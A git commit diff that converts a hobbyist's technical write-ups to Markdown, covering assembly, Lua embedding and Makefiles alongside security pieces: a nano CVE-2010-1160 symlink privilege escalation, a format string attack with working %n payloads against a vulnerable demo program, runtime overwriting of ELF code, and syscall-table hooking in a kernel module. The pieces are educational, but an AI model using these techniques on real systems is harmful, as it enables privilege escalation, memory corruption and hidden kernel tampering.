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authorFreeArtMan <>2021-05-27 21:10:45 +0100
committerFreeArtMan <>2021-05-27 21:10:45 +0100
commitefa24b220d9633d5d7bfef632b33df180dcb0e74 (patch)
parente63ed8a651e5246f8698a9c1c3e540029710d0e9 (diff)
Update 10 html to md articles
13 files changed, 1012 insertions, 10 deletions
diff --git a/md/ b/md/
index 25a0883..806c3e6 100644
--- a/md/
+++ b/md/
@@ -78,17 +78,17 @@ title: Writeup page
[Blender Scripts](writeup/
[C Bin2Hex](writeup/
[DWM desktop environment](writeup/
+[Assembler calculate polynomial](writeup/
+[CVE 2010-1160 Exploiting nano](writeup/
+[ELF rewrite function](writeup/
+[ELF text section](writeup/
+[Embedding Lua in C](writeup/
+[FPU catch division by zero](writeup/
+[Gimp Plugin](writeup/
+[Hooking interrupt descriptor table](writeup/
+[Linux Format String Attack](writeup/
+[Linux Local Descriptor Table](writeup/
-[Assembler calculate polynom](
-[CVE 2010-1160 Exploiting nano](
-[ELF rewrite function](
-[ELF text section](
-[Embeding Lua in C](
-[FPU catch division by zero](
-[Gimp Plugin](
-[Hooking interrupt descriptor table](
-[Linux Format String Attack 1](
-[Linux Local Descriptor Table](
[Linux PC speaker](
[Linux ShellCode 1](
[Linux keyboard LED](
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+title:Assembler calculate polynomial
+# Assembler calculate polynomial
+Calculating polynomial with asm and C
+format ELF
+section ".text" executable
+public poly
+align 4
+a equ dword [ebp+8]
+b equ dword [ebp+12]
+c equ dword [ebp+16]
+x equ dword [ebp+20]
+ ;a*x*x+b*x+c
+ push ebp
+ mov ebp , esp
+ fld c
+ fld x
+ fld b
+ fld x
+ fld a
+ fmulp st1 , st0
+ faddp st1 , st0
+ fmulp st1 , st0
+ faddp st1 , st0
+ pop ebp
+ ret
+For calculating polynomial used polish notation
+In other words a*x*x+b*x+c to reduce operations changed to (a*x+b)*x+c
+and then written out operation by priorities [*,+,*,+].
+Compiling this with lines
+fasm poly.asm poly.o
+#include <stdio.h>
+extern float poly( float , float , float , float );
+int main()
+ float res = poly( 1.0 , 2.0 , 3.0 , 3.0 );
+ printf( "%f\n" , res );
+ return 0;
+Compiling this with lines
+gcc -c main.c -o main.o
+gcc main.o poly.o -o main
+Update on 06.12.2009
+After running dome C code with FPU calculations and -O2 flag
+format ELF
+section ".text" executable
+public poly
+align 4
+a equ dword [ebp+8]
+b equ dword [ebp+12]
+c equ dword [ebp+16]
+x equ dword [ebp+20]
+ ;a*x*x+b*x+c
+ push ebp
+ mov ebp , esp
+ fld a
+ fmul x
+ fadd b
+ fmul x
+ fadd c
+ pop ebp
+ ret
+Now only 5 instructions
+# Links
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+title:CVE 2010-1160 Exploiting nano
+# CVE 2010-1160 Exploiting nano
+CVE-2010-1160 Nano Changed File Symlink Privilege Escalation
+Usualy if I have to edit some file I am using nano editor. It is almost
+on every distribution and easy and fast to use.
+Some time ago i hated vim beacouse of Ctrl-D =] and that way used nano or pico.
+Now I know how to exit from vim :q!. After this bug reported in CVE I was
+excited to check it out in real life. It is first bug that i have fully
+tested. This bug is fixed in newest versions. Testing all nano version
+this bug works on < 2.1.7 versions now on my system is latest nano
+version and I have compiled many < 2.1.7 versions to test this bug.
+To get your nano version run:
+$ nano -V
+When user is editing file nano don't check if it is edited by some one
+else. When saving file it simply save it and dont check if it was
+modified. If file was changed by some one else then nano will overwrite
+it with his text. But it can be changed to symlink that points to other file.
+How to use it in real life:
+1) Open file with nano
+2) Change file or set symlink
+3) Make changes in file and save file in nano
+4) See result in symlinked file
+Everything looks like
+$nano text.txt
+Now some one do:
+$ls -s empty.txt text.txt
+Nano save what you save in text.txt
+In python it looks like:
+os.remove( "text.txt" )
+open( "empty.txt" , "w" ).close()
+os.symlink( "empty.txt" , "text.txt"
+If you are root and opening file with owner isnt you.
+Than owner while you editing his file can setsymlink to some
+"/etc/important.conf" and you will overwrite it with some other
+unrelated info. This can make some harm to your system.
+How can it be exploited in real life by "small unprivileged user".
+Make some interesting file that root will interested in. Make some
+process that watch nanos running in system.
+If nano opened file is our , symlink it.
+1)Detect running nano in system
+2)Check with file is opened
+3)If file is yours make symlink
+Script is only for user and dont work if you try to symlink root
+opened nano. It makes all steps as described above. Change script
+variables for your tests:
+debug = True
+nano = "nano-2.0.9"
+user = "user"
+Tested only with python 2.6.5
+Simply be updated or if you using old nano dont open with
+privileged user unprivileged user files. It will save you from this bug.
+## Links
+## Downloads
+nano_bug.tar.gz -
+1KiB -
+nano_bug_catch.tar.gz -
+2KiB - \ No newline at end of file
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+title:ELF rewrite function
+# ELF rewrite function
+Main idea was to replace compiled in function with some other code and
+run it. In default it is not possible. If you try to write some bytes
+with memcpy() in function location then segfault happens. Why? Programm
+has different segments and they used for different program purpose.Our
+code belongs to readonly-executable segment. And '.text' section.
+We can se it with readelf -S main -l in previous post
+there was program that can be used to make segment writable.After running
+./textwriteble main
+now segment with '.text' section becomes writable. When we try
+use memcpy() there is no segfault now.
+Second thing is how to make our function that will
+replace compiled in function position independent for some data inside
+function? First of all we should know our current position.It is in
+eip register. push eip? mov eax, eip? it doesnt work. When we use
+call in stack is saved return address. Now with this small function it
+can be saved in some location
+ mov ecx, [esp]
+ ret
+At this moment we have converted segment to writable.Have written
+position detection function. If there would be data that will used
+in replaced function than need detect position of that data. For
+example we will use
+mov eax, sys_call ;we will use SYS_WRITE = 5
+mov ebx, output_id ; output on terminal is STDOUT 1
+mov ecx, pointer_to_msg
+mov edx, size_of_msg
+int 80h
+if this was ordinary situation then define:
+msg db "Hello",10
+msg_size = $-msg
+and our code becomes
+mov eax, SYS_WRITE
+mov ebx, STDOUT
+mov ecx, msg
+mov edx, msg_size
+int 80h
+but how to know position of msg if you dont know position where
+function will placed?Use function get_it and you will know current
+instruction position. And it will next instruction after
+call get_ip
+Our code becomes
+call get_ip ;calling and detecting eip
+saved_ip: ;position that will be saved
+jmp get_ip_end ;jump over function
+ mov ecx, [esp] ;save return eip
+ ret
+mov eax, SYS_WRITE
+mov ebx, STDOUT
+add ecx, msg-saved_ip ;offset of msg
+mov edx, msg_size
+int 80h
+ECX has position independent pointer to our text.For testing purposes
+function fun() is filled with
+asm(".byte 0x90, ... ,0x90");
+hex 0x90 translates in nop instruction.
+nop is No OPeration instruction.
+And function does nothing.Function fun() contains
+push ebp
+mov ebp, esp
+pop ebp
+Nop instructions can be replaced with any binary code. There should
+be enough nop instructions for our binary code. There is no check
+on function size that way when overwriting can be problems if binary
+code size is larger then function size.Start function overwriting at
+position (&fun+3) with memcpy()
+push ebp
+mov ebp, esp
+pop ebp
+Wuala function after enabling segment can be overwritten. Here is
+used previous experienced we have mega trick with function replacement.
+## Links
+## Downloads -
+4KiB - \ No newline at end of file
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index 0000000..60b8d58
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+title:ELF text section
+# ELF text section
+This code based on .text writable
+Find out .text section and make it writable.
+segmentcheck.h contains two functions
+int sec_text_check( FILE* );
+check if given file have .text writable section or not. return 0 if
+fasle, 1 if true and -1 if there was some kind error.
+int sec_text_set( FILE* , int );
+set section segment to writable/unwritable depends on second value
+that canbe 0 or 1.
+Source includes two tests for both functions.I have not tested both
+functions very whell. That whay there can be some error.I have used
+used that for proving concept. And have checked result with
+readelf -l simple
+## Links
+## Downloads
+elf_segment.tar.gz -
+26KiB -
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new file mode 100644
index 0000000..ee875ae
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+title:Embedding Lua in C
+# Embedding Lua in C
+Bedimming lua in you C programs is can be done in few minutes.
+Many examples is in
+First thing to write is module and then compile everything with lua precompiled lib.
+int module_register(lua_State*);
+void module_print(lua_State*);
+int module_getone(lua_State*);
+int module_gc(lua_State*);
+int module_tostring(lua_State*);
+static const luaL_reg module_methods[] =
+ //{,(void *)},
+ {"print", (void *)module_print},
+ {"getone", (void *)module_getone},
+ {0, 0}
+static const luaL_reg module_meta[] =
+ {"__gc", (void *)module_gc},
+ {"__tostring", (void *)module_tostring},
+ {0, 0}
+to make printf("%s\n") available in lua
+void module_print( lua_State *L)
+ int argc = lua_gettop(L);
+ int n;
+ for (n=1; n <= argc; n++) printf("%s\n", lua_tostring(L, n));
+next one function that have return value 1
+int module_getone(lua_State *L)
+ int x=1;
+ lua_pushnumber(L, x);
+ return 1;
+and easy to compile if needed.
+gcc -c module.c
+gcc module.o main.c -o main -llua
+## Links
+## Downloads -
+2KiB - \ No newline at end of file
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new file mode 100644
index 0000000..a27cd75
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+title:FPU catch division by zero
+# FPU catch division by zero
+There can occure some problems in C onw of them is divison on zero.
+For this we setup system exception handler or signal handler.
+When is division on zero it works.Also for return in main function
+there is used setjmp and longjmp
+void set_exception_handler()
+ int err;
+ fenv.__control_word &= ~FE_ALL_EXCEPT;
+ fenv.__cs_selector &= ~FE_ALL_EXCEPT << 7;
+ fesetenv( &fenv );
+ sa.sa_sigaction = &exception_handler;
+ sa.sa_flags = SA_SIGINFO;
+ err = sigaction( SIGFPE, &sa, NULL );
+ if (err != 0)
+ printf("Cannot set FloatingPoint exception handler\n");
+ else
+ printf("[OK] SIGFPE is set\n");
+void exception_handler(int i, siginfo_t *s, void *v )
+ if (s->si_signo == SIGFPE)
+ {
+ printf("[SIGFPE] SIGFPE Occure\n");
+ printf("[SIGFPE] Error number: %d\n", s->si_errno);
+ printf("[SIGFPE] Signal code: %d\n", s->si_code);
+ switch (s->si_code)
+ {
+ case FPE_INTDIV:
+ printf("[SIGFPE] Divison by 0\n");
+ longjmp( jmp , 1 );
+ break;
+ }
+ }
+ abort();
+Compilation is easy:
+gcc sigfpe.c -o sigfpe -lm
+Now it will no so big problem when some error occur to properly exit
+or make some checks.
+## Downloads -
+2KiB - \ No newline at end of file
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new file mode 100644
index 0000000..b0e0570
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@@ -0,0 +1,14 @@
+title:Gimp Plugin
+# Gimp Plugin
+Friend asked to write this plugin because he has tired to process his
+photos with same method many times. Plugin written in Python.
+Copy plugin file in gimp plugin directory. Under linux you should make
+it executable. Start Gimp and plugin works in
+## Downloads -
+1KiB - \ No newline at end of file
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new file mode 100644
index 0000000..a1c8349
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@@ -0,0 +1,112 @@
+title:X11 prototype GUI
+Hooking interrupt descriptor table
+Hook interrupt descriptor table
+Hooking interrupt table is very interesting thing
+with it you can dissallow some operations to be made or watch what
+happening in system. This article is more like review and more tehnical
+description is in link 1
+First thing that we should know that it will done trought kernel module
+there is 2 commands for loading and unloading modules
+there is way how we can check system call addresses and position of syscall
+grep sys_call_table /proc/kallsyms
+grep system_call /proc/kallsyms
+also we can use it for detecting our module functions and syscall addreses
+grep sys_write /proc/kallsyms
+or if we whant check out module functions
+grep hook_idt /proc/kallsyms
+We will now try to hook sys_mkdir. I usualy using some minimalistic
+windowmanagers but some browsers or other GUIsh programs like such directories
+"Download" or "Desktop" all my directories in ~/ is lowercase and I realy hate
+anoying "Download" and "Desktop" directories that are made without my permission
+and for my lowercase /home directory style is agly. With this hook they will
+be denied to make such thing.
+Out kernel module consist of such functions:
+static int __init hook_init(void) //stufff on module init,idt hooking
+static void __exit hook_exit(void) //stuff on module exit, restore idt table
+asmlinkage long hooked_mkdir(const char *filename, mode_t mode) //our hook function
+//how works this functions you can find in link number 1
+void *get_writable_sct(void *sct_addr)
+void *get_syscall_table(void)
+Basic hooked function is:
+asmlinkage long hooked_mkdir(const char *filename, mode_t mode)
+ return mkdir(filename, mode);
+but now we need to add check for ("Desktop","Download"). First we need some error
+that will returned when some one whant to make bad directory
+we will use EACCES error.
+here is modified functions for out task:
+//hook mkfile command
+asmlinkage long hooked_mkdir(const char *filename, mode_t mode)
+ //it will disallow all files that starts with Desktop&&Download
+ if (((strncmp(filename,"Desktop",7) == 0) && (strlen(filename) == 7)) ||
+ ((strncmp(filename,"Download",8) == 0) && (strlen(filename) == 8)))
+ {
+ printk(KERN_INFO "Mkdir hook\n");
+ return EACCES;
+ }
+ return real_mkdir(filename, mode);
+For module compiling:
+This is tested with kernel version 2.6.38
+## Links
+## Downloads -
+5KiB -
diff --git a/md/writeup/ b/md/writeup/
new file mode 100644
index 0000000..cbffe87
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+title:X11 Linux Format String Attack
+# Linux Format String Attack
+Format string attack is attack for C formated strings. Format string
+function is prinrf() there are other functions that
+support format string.C code for bad used printf():
+int main( int argc, char **argv )
+ static int i = 0;
+ char text[1000];
+ strcpy(text, argv[1]);
+ printf("%.8x\n",&i);
+ printf("No way it never will works because value of i=%d\n",i);
+ printf( text );
+ printf("\nValue of i=%d\n",i);
+ return 0;
+First output is address of static iThan we output values of
+i and call printf() with first argument fo programm.and
+then watching value if i
+./e1 'Halolo'
+No way it never will works because value of i=0
+Value of i=0
+./e1 'Halolo%s'
+No way it never will works because value of i=0Halolo(null)
+Value of i=0
+./e1 $'\x74\x96\x04\x08_%x'
+No way it never will works because value of i=0
+Value of i=0
+Read about %n in format string:
+./e1 $'\x74\x96\x04\x08_%x_%n'
+No way it never will works because value of i=0
+Segmentation fault
+./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
+No way it never will works because value of i=0
+Value of i=16
+./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
+No way it never will works because value of i=0
+Value of i=1216
+Now you can input almost any value to i
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+title:Linux Local Descriptor Table
+# Linux Local Descriptor Table
+Is 32bit Intel ELF 0x80**** adreeses is default? nope. You can setup
+your own. Compiler will not see thembut you can do it.
+Setup LDT and you will see it.
+mov dword [0] ,"Hall"
+mov dword [4] ,"Ball"
+mov dword [8] ,"Mall"
+mov dword [12],0x00000000
+yes everything starts from 0x0
+#include <stdlib.h>
+#include <stdio.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/ldt.h>
+char new_segment[16];
+int main()
+ int r;
+ struct user_desc *ldt;
+ ldt = (struct user_desc*)malloc(sizeof(struct user_desc));
+ ldt->entry_number = 0;
+ ldt->base_addr = ((unsigned long)&new_segment);
+ ldt->limit = 16;
+ ldt->seg_32bit = 0x1;
+ ldt->contents = 0x0;
+ ldt->read_exec_only = 0x0;
+ ldt->limit_in_pages = 0x0;
+ ldt->seg_not_present = 0x0;
+ ldt->useable = 0x1;
+ printf("Start\n");
+ r = syscall( __NR_modify_ldt, 1 , ldt , sizeof(struct user_desc) );
+ if ( r == -1 )
+ {
+ printf("Sorry\n");
+ exit( 0 );
+ }
+ asm("pushl %ds");
+ asm("movl $0x7, %eax"); /* 0111: 0-Index 1-Using the LDT table 11-RPL of 3 */
+ asm("movl %eax, %ds");
+ asm(".byte 0xc7,0x5,0x0,0x0,0x0,0x0,0x48,0x61,
+ 0x6c,0x6c,0xc7,0x5,0x4,0x0,0x0,0x0,
+ 0x42,0x61,0x6c,0x6c,0xc7,0x5,0x8,0x0,
+ 0x0,0x0,0x4d,0x61,0x6c,0x6c,0xc7,0x5,
+ 0xc,0x0,0x0,0x0,0x0,0x0,0x0,0x0");
+ asm("popl %ds");
+ printf("End\n");
+ printf("Segment [%s]\n",new_segment);
+ free( ldt );
+ return 0;
+asm(".byte ... ") // is code.bin
+fasm code.asm code.bin
+gcc main.c -o main
+## Downloads -
+2KiB - \ No newline at end of file
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new file mode 100644
index 0000000..eee99a1
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+title:Makefile tips
+# Makefile tips
+Makefile working tips. Usual simple makefile
+looks like this:
+ gcc main.c -o main
+but when your project grows and you use more files it becomes
+like this:
+ gcc -O2 -c file1.c
+ gcc -O2 -c file2.c
+ gcc -O2 -c file3.c
+ gcc -O2 main.c file1.o file2.o file3.o -o main
+This is standard growth of file. Its better practice to
+reuse your code, it could applied to your makefile also.
+When you have few small project and you want simply copy
+makefile and it works.
+## Compiler name
+Usually everyone prefer one compiler. And time to time only
+check if code compiles with other compilers.
+ $(CC) -O2 -c file1.c
+ $(CC) -O2 -c file2.c
+ $(CC) -O2 -c file3.c
+ $(CC) -O2 main.c file1.o file2.o file3.o -o main
+## Project name
+Every project have unique name and you also would like
+to change it if there is need.
+ $(CC) -O2 -c file1.c
+ $(CC) -O2 -c file2.c
+ $(CC) -O2 -c file3.c
+ $(CC) -O2 main.c file1.o file2.o file3.o -o $(PROJECT)
+## Compiler flags
+Usual problem is when some compiling flags causes problems
+and you need to change every single entry in file.
+ $(CC) $(CFLAGS) -c file1.c
+ $(CC) $(CFLAGS) -c file2.c
+ $(CC) $(CFLAGS) -c file3.c
+ $(CC) $(CFLAGS) main.c file1.o file2.o file3.o -o $(PROJECT)
+This 3 variables reduce how number of places that you need
+to edit if something changes.
+Next thing is to fix problem when you need to add or remove
+file from project and after that you have manually to edit
+at least 2 lined in makefile.
+## Use multiple files
+One of they ways how to reduce number of files edited is to add
+new variable where all files is listed:
+SOURCES=file1.c file2.c file3.c
+$(PROJECT): $(SOURCES) main.c
+ $(CC) $(OBJECTS) $(CFLAGS) main.c -o $(PROJECT)
+%.o: %.c
+ $(CC) $(CFLAGS) -c $<
+Here was added file auto-matching for *.c files to make them *.o
+## Auto matching C files
+Last thing to add is auto match all *.c in directory.
+SOURCES=$(wildcard *.c)
+$(PROJECT): $(SOURCES) main.c
+%.o: %.c
+ $(CC) $(CFLAGS) -c $<
+Now project makefile can be easily copied and with
+changing only one variable value everything should be OK
+To run any makefile:
+make -f
+## Downloads
+3KiB -
diff --git a/md/writeup/ b/md/writeup/
index afdf6fa..3a7c4ea 100644
--- a/md/writeup/
+++ b/md/writeup/
@@ -151,6 +151,30 @@ Linux Documentation/admin-guide/init.rst for guidance. ]---"
Next step is to figure out what to do with this info, maybe make your own distro?
Create some cool ass crypto drive? Or just have fun.
+## Resize image
+When space runs out on the virtual machine, provided images can be resized
+Here is example how to resize image to bigger size and still be able to run it on
+Main step that is may harm is fdisk, save disk layout with
+fdisk -l of=raspbian-stretch-lite-20gb.img
+and use it for later reference when partition will be resized.
+dd if=2017-08-